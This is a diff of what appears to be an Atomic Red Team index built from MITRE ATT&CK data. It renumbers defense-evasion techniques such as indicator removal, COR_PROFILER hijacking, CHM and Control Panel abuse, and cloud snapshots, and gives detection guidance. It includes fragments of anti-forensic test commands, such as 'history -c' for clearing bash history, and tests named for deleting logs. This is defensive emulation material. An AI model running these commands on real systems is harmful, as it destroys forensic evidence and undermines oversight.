+ description: Almond. (2019, April 30). UAC bypass via elevated .NET applications.
+ Retrieved June 24, 2020.
+ - source_name: GitHub OmerYa Invisi-Shell
+ url: https://github.com/OmerYa/Invisi-Shell
+ description: Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24,
+ 2020.
+ - source_name: subTee .NET Profilers May 2017
+ url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
+ description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
+ Profilers. Retrieved June 24, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: COR_PROFILER
+ description: |-
+ Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
+
+ The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
+
+ Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
+ id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-06-26T16:09:58.920Z'
+ created: '2020-06-24T22:30:55.843Z'
+ x_mitre_detection: 'For detecting system and user scope abuse of the COR_PROFILER,
+ monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and
+ COR_PROFILER_PATH that correspond to system and user environment variables
+ that do not correlate to known developer tools. Extra scrutiny should be placed
+ on suspicious modification of these Registry keys by command line tools like
+ wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring
+ for command-line arguments indicating a change to COR_PROFILER variables may
+ aid in detection. For system, user, and process scope abuse of the COR_PROFILER,
+ monitor for new suspicious unmanaged profiling DLLs loading into .NET processes
+ shortly after the CLR causing abnormal process behavior.(Citation: Red Canary
+ COR_PROFILER May 2020) Consider monitoring for DLL files that are associated
+ with COR_PROFILER environment variables.'
+ x_mitre_data_sources:
+ - Windows Registry
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_contributors:
+ - Jesse Brown, Red Canary
+ x_mitre_platforms:
+ - Windows
+ atomic_tests: []
+ T1070.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1070.003
+ url: https://attack.mitre.org/techniques/T1070/003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
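Review bot: The new COR_PROFILER description carries a spelling error in the added `description:` block, `These profiliers are designed to monitor`, which should read `These profilers are designed to monitor, troubleshoot, and debug managed code`. The same kind of inherited wording defect appears in the Compiled HTML File hunk further down, where the rewritten sentence now reads `bypass application application control` and should be `bypass application control on older and/or unpatched systems`. Both strings appear to be copied from the upstream ATT&CK data this index is generated from, so they are better corrected at the source or in the generator than by hand-editing this file, otherwise the next regeneration reintroduces them. No change to the index structure or to any identifier is implied.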
@@ -21016,25 +21460,25 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T21:31:03.043Z'
created: '2020-01-31T12:32:08.228Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_data_sources:
- - File monitoring
- - Authentication logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
+ - Log analysis
x_mitre_detection: User authentication, especially via remote terminal services
like SSH, without new entries in that user's ~/.bash_history
is suspicious. Additionally, the modification of the HISTFILE
and HISTFILESIZE environment variables or the removal/clearing
of the ~/.bash_history file are indicators of suspicious activity.
- x_mitre_defense_bypassed:
- - Host forensic analysis
- - Log analysis
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- identifier: T1551.003
+ x_mitre_data_sources:
+ - File monitoring
+ - Authentication logs
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ identifier: T1070.003
atomic_tests:
- name: Clear Bash history (rm)
auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc
@@ -21131,12 +21575,12 @@ defense-evasion:
. ~/.bashrc
history -c
name: sh
- T1551.002:
+ T1070.002:
technique:
external_references:
- source_name: mitre-attack
- external_id: T1551.002
- url: https://attack.mitre.org/techniques/T1551/002
+ external_id: T1070.002
+ url: https://attack.mitre.org/techniques/T1070/002
- source_name: Linux Logs
url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
@@ -21162,19 +21606,19 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T21:23:51.886Z'
created: '2020-01-28T17:11:54.034Z'
- x_mitre_platforms:
- - Linux
- - macOS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: File system monitoring may be used to detect improper deletion
+ or modification of indicator files. Also monitor for suspicious processes
+ interacting with log files.
x_mitre_data_sources:
- Process command-line parameters
- Process monitoring
- File monitoring
- x_mitre_detection: File system monitoring may be used to detect improper deletion
- or modification of indicator files. Also monitor for suspicious processes
- interacting with log files.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- identifier: T1551.002
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ identifier: T1070.002
atomic_tests:
- name: rm -rf
auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683
@@ -21227,12 +21671,12 @@ defense-evasion:
'
name: bash
- T1551.001:
+ T1070.001:
technique:
external_references:
- source_name: mitre-attack
- external_id: T1551.001
- url: https://attack.mitre.org/techniques/T1551/001
+ external_id: T1070.001
+ url: https://attack.mitre.org/techniques/T1070/001
- url: https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil
description: Plett, C. et al.. (2017, October 16). wevtutil. Retrieved July
2, 2018.
@@ -21265,29 +21709,29 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T21:17:03.732Z'
created: '2020-01-28T17:05:14.707Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - API monitoring
- - Process command-line parameters
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Clearing the Windows event logs requires Administrator permissions
+ x_mitre_defense_bypassed:
+ - Anti Virus
+ - Host Intrusion Prevention Systems
+ - Log Analysis
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: 'Deleting Windows event logs (via native binaries (Citation:
Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear),
or [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation:
Microsoft Clear-EventLog)) may also generate an alterable event (Event ID
1102: "The audit log was cleared").'
- x_mitre_permissions_required:
- - Administrator
- x_mitre_defense_bypassed:
- - Anti Virus
- - Host Intrusion Prevention Systems
- - Log Analysis
- x_mitre_system_requirements:
- - Clearing the Windows event logs requires Administrator permissions
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- identifier: T1551.001
+ x_mitre_data_sources:
+ - API monitoring
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - Windows
+ identifier: T1070.001
atomic_tests:
- name: Clear Logs
auto_generated_guid: e6abb60e-26b8-41da-8aae-0c35174b0967
@@ -21361,6 +21805,19 @@ defense-evasion:
phase_name: initial-access
modified: '2020-03-23T21:59:36.729Z'
created: '2020-03-13T20:36:57.378Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
+ or malicious activity, such as accessing information outside of the normal
+ function of the account or account usage at atypical hours.
+ x_mitre_data_sources:
+ - Azure activity logs
+ - Authentication logs
+ - AWS CloudTrail logs
+ - Stackdriver logs
x_mitre_platforms:
- AWS
- GCP
@@ -21368,22 +21825,32 @@ defense-evasion:
- SaaS
- Azure AD
- Office 365
- x_mitre_data_sources:
- - Azure activity logs
- - Authentication logs
- - AWS CloudTrail logs
- - Stackdriver logs
- x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
- or malicious activity, such as accessing information outside of the normal
- function of the account or account usage at atypical hours.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1553.002:
technique:
+ created: '2020-02-05T16:27:37.784Z'
+ modified: '2020-02-10T19:51:01.601Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082
+ description: "Adversaries may create, acquire, or steal code signing materials
+ to sign their malware or tools. Code signing provides a level of authenticity
+ on a binary from the developer and a guarantee that the binary has not been
+ tampered with. (Citation: Wikipedia Code Signing) The certificates used during
+ an operation may be created, acquired, or stolen by the adversary. (Citation:
+ Securelist Digital Certificates) (Citation: Symantec Digital Certificates)
+ Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001),
+ this activity will result in a valid signature.\n\nCode signing to verify
+ software on first run can be used on modern Windows and macOS/OS X systems.
+ It is not used on Linux due to the decentralized nature of the platform. (Citation:
+ Wikipedia Code Signing) \n\nCode signing certificates may be used to bypass
+ security policies that require signed code to execute on a system. "
+ name: Code Signing
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1553.002
@@ -21400,29 +21867,6 @@ defense-evasion:
description: Shinotsuka, H. (2013, February 22). How Attackers Steal Private
Keys from Digital Certificates. Retrieved March 31, 2016.
source_name: Symantec Digital Certificates
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Code Signing
- description: "Adversaries may create, acquire, or steal code signing materials
- to sign their malware or tools. Code signing provides a level of authenticity
- on a binary from the developer and a guarantee that the binary has not been
- tampered with. (Citation: Wikipedia Code Signing) The certificates used during
- an operation may be created, acquired, or stolen by the adversary. (Citation:
- Securelist Digital Certificates) (Citation: Symantec Digital Certificates)
- Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001),
- this activity will result in a valid signature.\n\nCode signing to verify
- software on first run can be used on modern Windows and macOS/OS X systems.
- It is not used on Linux due to the decentralized nature of the platform. (Citation:
- Wikipedia Code Signing) \n\nCode signing certificates may be used to bypass
- security policies that require signed code to execute on a system. "
- id: attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-02-10T19:51:01.601Z'
- created: '2020-02-05T16:27:37.784Z'
x_mitre_platforms:
- macOS
- Windows
@@ -21438,6 +21882,21 @@ defense-evasion:
atomic_tests: []
T1027.004:
technique:
+ created: '2020-03-16T15:30:57.711Z'
+ modified: '2020-03-29T20:59:32.293Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+ description: |-
+ Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+
+ Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
+ name: Compile After Delivery
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1027.004
@@ -21451,21 +21910,6 @@ defense-evasion:
url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
Info Stealer and Adware. Retrieved April 25, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Compile After Delivery
- description: |-
- Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
-
- Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
- id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-29T20:59:32.293Z'
- created: '2020-03-16T15:30:57.711Z'
x_mitre_platforms:
- Linux
- macOS
@@ -21564,7 +22008,7 @@ defense-evasion:
description: |-
Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)
- A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application whitelisting on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)
+ A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)
name: Compiled HTML File
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -21597,27 +22041,27 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T21:04:50.295Z'
+ modified: '2020-06-20T22:32:24.589Z'
created: '2020-01-23T18:53:54.377Z'
- x_mitre_contributors:
- - Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_defense_bypassed:
- - Digital Certificate Validation
- - Application whitelisting
- x_mitre_permissions_required:
- - User
+ x_mitre_platforms:
+ - Windows
x_mitre_detection: |-
Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.
Monitor presence and use of CHM files, especially if they are not typically used within an environment.
- x_mitre_platforms:
- - Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_defense_bypassed:
+ - Digital Certificate Validation
+ - Application control
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
identifier: T1218.001
atomic_tests:
- name: Compiled HTML Help Local Payload
@@ -21695,27 +22139,27 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-23T23:48:33.904Z'
created: '2019-12-19T20:21:21.669Z'
- x_mitre_platforms:
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Ability to update component device firmware from the host operating system.
+ x_mitre_permissions_required:
+ - SYSTEM
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host intrusion prevention systems
+ - File monitoring
+ x_mitre_detection: |-
+ Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
+
+ Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.
x_mitre_data_sources:
- Component firmware
- Process monitoring
- Disk forensics
- API monitoring
- x_mitre_detection: |-
- Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
-
- Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host intrusion prevention systems
- - File monitoring
- x_mitre_permissions_required:
- - SYSTEM
- x_mitre_system_requirements:
- - Ability to update component device firmware from the host operating system.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1218.002:
technique:
@@ -21725,7 +22169,7 @@ defense-evasion:
For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)
- Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.
+ Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
name: Control Panel
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -21754,17 +22198,17 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T16:11:43.517Z'
+ modified: '2020-06-20T22:33:18.929Z'
created: '2020-01-23T19:59:52.630Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_defense_bypassed:
- - Process whitelisting
- - Application whitelisting
+ x_mitre_platforms:
+ - Windows
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ - Windows Registry
+ - DLL monitoring
+ - Binary file metadata
+ - API monitoring
x_mitre_detection: |-
Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe. (Citation: TrendMicro CPL Malware Jan 2014)
@@ -21775,15 +22219,14 @@ defense-evasion:
* Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Controls Folder\{name}\Shellex\PropertySheetHandlers where {name} is the predefined name of the system item. (Citation: Microsoft Implementing CPL)
Analyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques. (Citation: TrendMicro CPL Malware Jan 2014)
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- - Windows Registry
- - DLL monitoring
- - Binary file metadata
- - API monitoring
- x_mitre_platforms:
- - Windows
+ x_mitre_defense_bypassed:
+ - Application control
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1218.002
atomic_tests:
- name: Control Panel Items
@@ -21810,6 +22253,60 @@ defense-evasion:
'
name: command_prompt
+ T1578.002:
+ technique:
+ id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+ description: |-
+ An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
+
+ Creating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.
+ name: Create Cloud Instance
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1578.002
+ url: https://attack.mitre.org/techniques/T1578/002
+ - source_name: Mandiant M-Trends 2020
+ url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
+ April 24, 2020.
+ - source_name: AWS CloudTrail Search
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ - source_name: Azure Activity Logs
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ - source_name: Cloud Audit Logs
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-06-18T11:45:36.417Z'
+ created: '2020-05-14T14:45:15.978Z'
+ x_mitre_platforms:
+ - AWS
+ - GCP
+ - Azure
+ x_mitre_data_sources:
+ - GCP audit logs
+ - Stackdriver logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ x_mitre_permissions_required:
+ - User
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_detection: |-
+ The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
+
+ In AWS, CloudTrail logs capture the creation of an instance in the RunInstances event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create to create a VM.(Citation: Cloud Audit Logs)
+ atomic_tests: []
T1134.002:
technique:
external_references:
@@ -21839,28 +22336,116 @@ defense-evasion:
phase_name: privilege-escalation
modified: '2020-03-26T21:28:19.476Z'
created: '2020-02-18T16:48:56.582Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - Access tokens
- - API monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_defense_bypassed:
+ - Windows User Account Control
+ - System access controls
+ - File system access controls
x_mitre_detection: |-
If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.
Analysts can also monitor for use of Windows APIs such as DuplicateToken(Ex) and CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
- x_mitre_defense_bypassed:
- - Windows User Account Control
- - System access controls
- - File system access controls
- x_mitre_is_subtechnique: true
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - Access tokens
+ - API monitoring
+ x_mitre_platforms:
+ - Windows
+ atomic_tests: []
+ T1578.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1578.001
+ url: https://attack.mitre.org/techniques/T1578/001
+ - source_name: Mandiant M-Trends 2020
+ url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
+ April 24, 2020.
+ - source_name: AWS Cloud Trail Backup API
+ url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+ description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+ Retrieved April 27, 2020.
+ - source_name: Azure - Monitor Logs
+ url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+ description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+ Retrieved May 1, 2020.
+ - source_name: Cloud Audit Logs
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ - source_name: GCP - Creating and Starting a VM
+ url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+ description: Google. (2020, April 23). Creating and Starting a VM instance.
+ Retrieved May 1, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Create Snapshot
+ description: |-
+ An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1536) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
+
+ An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)
+ id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-06-19T14:45:59.618Z'
+ created: '2020-06-09T15:33:13.563Z'
x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
